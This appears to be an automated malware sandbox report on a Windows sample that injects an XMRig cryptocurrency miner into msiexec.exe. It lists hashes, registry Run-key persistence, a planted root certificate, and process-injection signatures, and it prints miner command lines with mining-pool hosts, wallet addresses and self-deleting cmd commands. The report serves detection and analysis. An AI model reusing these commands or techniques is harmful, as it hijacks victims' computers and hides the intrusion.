Analysis
-
max time kernel
75s -
max time network
136s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
04-04-2021 11:52
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7v20201028
General
-
Target
file.exe
-
Size
126KB
-
MD5
fdefd1e361d1020577bf018a5a98040c
-
SHA1
2d7c4cfa15f4cb29ce95e7a59c3089a081a772a2
-
SHA256
01cb6ab274dc0ac90192b537a606965d98f03d99c95b3a0e24bc6cad724d42c7
-
SHA512
adb42dc5cc31b95f6e3d463068d57480acb50c80ce49f4fabd0fa87700dda3d92afe543f2569f2e92077afd0d00869c5cdf24902968050132eccd9a230719378
Malware Config
Signatures
-
XMRig Miner Payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/3472-14-0x00000001402CA898-mapping.dmp xmrig behavioral2/memory/3472-13-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/3472-16-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/3472-17-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Blocklisted process makes network request 1 IoCs
Processes:
msiexec.exeflow pid process 35 3472 msiexec.exe -
Executes dropped EXE 2 IoCs
Processes:
AE08.tmp.exeAF03.tmp.exepid process 3404 AE08.tmp.exe 96 AF03.tmp.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
AE08.tmp.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AE08.tmp.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe" AE08.tmp.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
AE08.tmp.exedescription pid process target process PID 3404 set thread context of 2956 3404 AE08.tmp.exe msiexec.exe PID 3404 set thread context of 3472 3404 AE08.tmp.exe msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3284 timeout.exe -
Modifies data under HKEY_USERS 1 IoCs
Processes:
file.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\PegasPc file.exe -
Processes:
file.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 file.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e file.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
file.exepid process 644 file.exe 644 file.exe 644 file.exe 644 file.exe 644 file.exe 644 file.exe 644 file.exe 644 file.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
msiexec.exefile.exedescription pid process Token: SeLockMemoryPrivilege 3472 msiexec.exe Token: SeLockMemoryPrivilege 3472 msiexec.exe Token: SeDebugPrivilege 644 file.exe -
Suspicious use of WriteProcessMemory 44 IoCs
Processes:
file.exeAE08.tmp.execmd.exeAF03.tmp.execmd.exedescription pid process target process PID 644 wrote to memory of 3404 644 file.exe AE08.tmp.exe PID 644 wrote to memory of 3404 644 file.exe AE08.tmp.exe PID 644 wrote to memory of 96 644 file.exe AF03.tmp.exe PID 644 wrote to memory of 96 644 file.exe AF03.tmp.exe PID 644 wrote to memory of 96 644 file.exe AF03.tmp.exe PID 3404 wrote to memory of 2956 3404 AE08.tmp.exe msiexec.exe PID 3404 wrote to memory of 2956 3404 AE08.tmp.exe msiexec.exe PID 3404 wrote to memory of 2956 3404 AE08.tmp.exe msiexec.exe PID 3404 wrote to memory of 2956 3404 AE08.tmp.exe msiexec.exe PID 3404 wrote to memory of 2956 3404 AE08.tmp.exe msiexec.exe PID 3404 wrote to memory of 2956 3404 AE08.tmp.exe msiexec.exe PID 3404 wrote to memory of 2956 3404 AE08.tmp.exe msiexec.exe PID 3404 wrote to memory of 2956 3404 AE08.tmp.exe msiexec.exe PID 3404 wrote to memory of 2956 3404 AE08.tmp.exe msiexec.exe PID 3404 wrote to memory of 2956 3404 AE08.tmp.exe msiexec.exe PID 3404 wrote to memory of 2956 3404 AE08.tmp.exe msiexec.exe PID 3404 wrote to memory of 2956 3404 AE08.tmp.exe msiexec.exe PID 3404 wrote to memory of 3472 3404 AE08.tmp.exe msiexec.exe PID 3404 wrote to memory of 3472 3404 AE08.tmp.exe msiexec.exe PID 3404 wrote to memory of 3472 3404 AE08.tmp.exe msiexec.exe PID 3404 wrote to memory of 3472 3404 AE08.tmp.exe msiexec.exe PID 3404 wrote to memory of 3472 3404 AE08.tmp.exe msiexec.exe PID 3404 wrote to memory of 3472 3404 AE08.tmp.exe msiexec.exe PID 3404 wrote to memory of 3472 3404 AE08.tmp.exe msiexec.exe PID 3404 wrote to memory of 3472 3404 AE08.tmp.exe msiexec.exe PID 3404 wrote to memory of 3472 3404 AE08.tmp.exe msiexec.exe PID 3404 wrote to memory of 3472 3404 AE08.tmp.exe msiexec.exe PID 3404 wrote to memory of 3472 3404 AE08.tmp.exe msiexec.exe PID 3404 wrote to memory of 3472 3404 AE08.tmp.exe msiexec.exe PID 3404 wrote to memory of 3472 3404 AE08.tmp.exe msiexec.exe PID 3404 wrote to memory of 3472 3404 AE08.tmp.exe msiexec.exe PID 3404 wrote to memory of 3472 3404 AE08.tmp.exe msiexec.exe PID 644 wrote to memory of 2192 644 file.exe cmd.exe PID 644 wrote to memory of 2192 644 file.exe cmd.exe PID 644 wrote to memory of 2192 644 file.exe cmd.exe PID 2192 wrote to memory of 2320 2192 cmd.exe PING.EXE PID 2192 wrote to memory of 2320 2192 cmd.exe PING.EXE PID 2192 wrote to memory of 2320 2192 cmd.exe PING.EXE PID 96 wrote to memory of 4084 96 AF03.tmp.exe cmd.exe PID 96 wrote to memory of 4084 96 AF03.tmp.exe cmd.exe PID 96 wrote to memory of 4084 96 AF03.tmp.exe cmd.exe PID 4084 wrote to memory of 3284 4084 cmd.exe timeout.exe PID 4084 wrote to memory of 3284 4084 cmd.exe timeout.exe PID 4084 wrote to memory of 3284 4084 cmd.exe timeout.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\AE08.tmp.exe"C:\Users\Admin\AppData\Roaming\AE08.tmp.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999993⤵
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99993⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\AF03.tmp.exe"C:\Users\Admin\AppData\Roaming\AF03.tmp.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\AF03.tmp.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout /t 34⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\file.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.13⤵
- Runs ping.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\AE08.tmp.exeMD5
01e6cae5a0f506d2b3b01162bcc7b078
SHA16e6d05630da0163a38a70865280fcad42ab1c74d
SHA25625e36c95be9a4255ae41717a89b4f3749bc438640fc48be7b7560cd1afb855d1
SHA512ee4fa60e70f6532896633a6c2f683405fa2f4246b9e4336a9a0171124e21761153c859f2ca69207e0e1a4f8979d192727c0b6c05879f4676646c1c12010a77ea
-
C:\Users\Admin\AppData\Roaming\AE08.tmp.exeMD5
01e6cae5a0f506d2b3b01162bcc7b078
SHA16e6d05630da0163a38a70865280fcad42ab1c74d
SHA25625e36c95be9a4255ae41717a89b4f3749bc438640fc48be7b7560cd1afb855d1
SHA512ee4fa60e70f6532896633a6c2f683405fa2f4246b9e4336a9a0171124e21761153c859f2ca69207e0e1a4f8979d192727c0b6c05879f4676646c1c12010a77ea
-
C:\Users\Admin\AppData\Roaming\AF03.tmp.exeMD5
98d0976214fb5720a6b2c23ba035b741
SHA11eb4da1f7de4ca6718d75c6ac713b6324948ad6c
SHA256553e5fd6df66c3d38733e1942ffbf2557843fc19c48fa1a2379eee9eb528c144
SHA5124a1bf187b5483d70925cb1ae91090f2abde87ecd115d298f01e0c9c0b9bf428c53b3db6c6173aaf4b96cc345b093cd95cf2641894dc7b1edfdc2689ef6582925
-
C:\Users\Admin\AppData\Roaming\AF03.tmp.exeMD5
98d0976214fb5720a6b2c23ba035b741
SHA11eb4da1f7de4ca6718d75c6ac713b6324948ad6c
SHA256553e5fd6df66c3d38733e1942ffbf2557843fc19c48fa1a2379eee9eb528c144
SHA5124a1bf187b5483d70925cb1ae91090f2abde87ecd115d298f01e0c9c0b9bf428c53b3db6c6173aaf4b96cc345b093cd95cf2641894dc7b1edfdc2689ef6582925
-
memory/96-22-0x0000000000400000-0x000000000587C000-memory.dmpFilesize
84.5MB
-
memory/96-6-0x0000000000000000-mapping.dmp
-
memory/96-21-0x00000000077E0000-0x000000000CC5C000-memory.dmpFilesize
84.5MB
-
memory/644-9-0x0000000003600000-0x0000000003648000-memory.dmpFilesize
288KB
-
memory/644-2-0x00000000009C0000-0x00000000009CD000-memory.dmpFilesize
52KB
-
memory/2192-19-0x0000000000000000-mapping.dmp
-
memory/2320-20-0x0000000000000000-mapping.dmp
-
memory/2956-12-0x0000000140000000-0x0000000140383000-memory.dmpFilesize
3.5MB
-
memory/2956-11-0x00000001401FBC30-mapping.dmp
-
memory/2956-10-0x0000000140000000-0x0000000140383000-memory.dmpFilesize
3.5MB
-
memory/3284-24-0x0000000000000000-mapping.dmp
-
memory/3404-3-0x0000000000000000-mapping.dmp
-
memory/3472-18-0x000002695B400000-0x000002695B420000-memory.dmpFilesize
128KB
-
memory/3472-17-0x0000000140000000-0x000000014070A000-memory.dmpFilesize
7.0MB
-
memory/3472-16-0x0000000140000000-0x000000014070A000-memory.dmpFilesize
7.0MB
-
memory/3472-15-0x000002695B3C0000-0x000002695B3D4000-memory.dmpFilesize
80KB
-
memory/3472-14-0x00000001402CA898-mapping.dmp
-
memory/3472-13-0x0000000140000000-0x000000014070A000-memory.dmpFilesize
7.0MB
-
memory/3472-25-0x000002695B520000-0x000002695B540000-memory.dmpFilesize
128KB
-
memory/4084-23-0x0000000000000000-mapping.dmp